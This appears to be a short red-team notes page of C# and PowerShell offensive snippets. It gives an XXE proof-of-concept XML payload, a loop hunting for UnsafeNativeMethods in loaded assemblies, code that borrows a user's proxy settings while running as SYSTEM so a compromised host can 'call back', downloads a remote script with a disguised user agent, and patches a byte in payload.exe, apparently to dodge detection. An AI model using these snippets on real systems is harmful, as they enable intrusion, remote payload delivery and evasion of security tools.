Comment on page
C#
Install-Package Costura.Fody
XMLDocument PoC:
<?xml version='1.0' ?><!DOCTYPE doc [<!ENTITY win SYSTEM 'http://127.0.0.1:8000/hi'>]><doc>&win;</doc>
This works on Net Framework <= 4.0 if the Resolver was not explicitly set to null.
It will not verify through the chain but if the program does not check the whole chain it works ;-)
$Assemblies = [AppDomain]::CurrentDomain.GetAssemblies()
$Assemblies |
ForEach-Object {
$_.Location
$_.GetTypes()|
ForEach-Object {
$_ | Get-Member -Static| Where-Object {
$_.TypeName.Equals('Microsoft.Win32.UnsafeNativeMethods')
}
} 2> $null
}
Sometimes we execute as SYSTEM and still need to use the boxes proxy settings to call back to us. In this case we can resolve the current proxy settings from HKCU and copy them.
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem 'HKU:\'
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}}
$proxy=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[system.net.webrequest]::DefaultWebProxy = new-object
System.Net.WebProxy("http://$proxy")
$wc = new-object system.net.WebClient
$wc.Headers.Add('User-Agent', "Legit User Agent")
$wc.DownloadString("http://<ip>/script.ps1")
$bytes = [System.IO.File]::ReadAllBytes("payload.exe")
$bytes[200] = 0xFF
[System.IO.File]::WriteAllBytes("payload.exe", $bytes)
Last modified 9mo ago